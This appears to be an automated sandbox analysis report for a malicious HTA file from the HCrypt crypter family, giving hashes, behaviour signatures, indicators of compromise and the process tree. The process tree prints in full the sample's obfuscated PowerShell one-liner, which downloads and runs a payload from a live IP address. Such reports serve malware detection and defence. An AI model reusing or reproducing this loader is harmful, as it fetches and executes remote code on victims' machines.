135.148.74.241_HCrypt.zip

General

Target     135.148.74.241_HCrypt/PS1.hta
Filesize   3KB
Completed  20-01-2022 14:34
Score      10/10
MD5        37f9dc388fedc16b308acaadc34c2054
SHA1       25c936c0b399b82ad39363f6237fd5db13369bda
SHA256     f30cba9be2a7cf581939e7e7b958d5e0554265a685b3473947bf2c26679995d3

Malware Config

Extracted

Language      ps1
Deobfuscated
URLs
exe.dropper   http://135.148.74.241/PS1_B.txt

Signatures 5

  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Modifies Internet Explorer settings
    mshta.exe

    TTPs

    Modify Registry

    Reported IOCs

    description    ioc                                                                                                    process
    Key created    \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main    mshta.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe

    Reported IOCs

    pid     process
    1468    powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe

    Reported IOCs

    description                pid     process
    Token: SeDebugPrivilege    1468    powershell.exe
  • Suspicious use of WriteProcessMemory
    mshta.exe

    Reported IOCs

    description                         pid    process      target process
    PID 760 wrote to memory of 1468     760    mshta.exe    powershell.exe
    PID 760 wrote to memory of 1468     760    mshta.exe    powershell.exe
    PID 760 wrote to memory of 1468     760    mshta.exe    powershell.exe
    PID 760 wrote to memory of 1468     760    mshta.exe    powershell.exe
Processes 2
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\135.148.74.241_HCrypt\PS1.hta"
    Modifies Internet Explorer settings
    Suspicious use of WriteProcessMemory
    PID:760
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'http://135.148.74.241/PS1_B.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1468
Network
Downloads
  • memory/1468-53-0x0000000075D61000-0x0000000075D63000-memory.dmp
  • memory/1468-56-0x0000000002560000-0x00000000031AA000-memory.dmp
  • memory/1468-57-0x0000000002560000-0x00000000031AA000-memory.dmp
  • memory/1468-58-0x0000000002560000-0x00000000031AA000-memory.dmp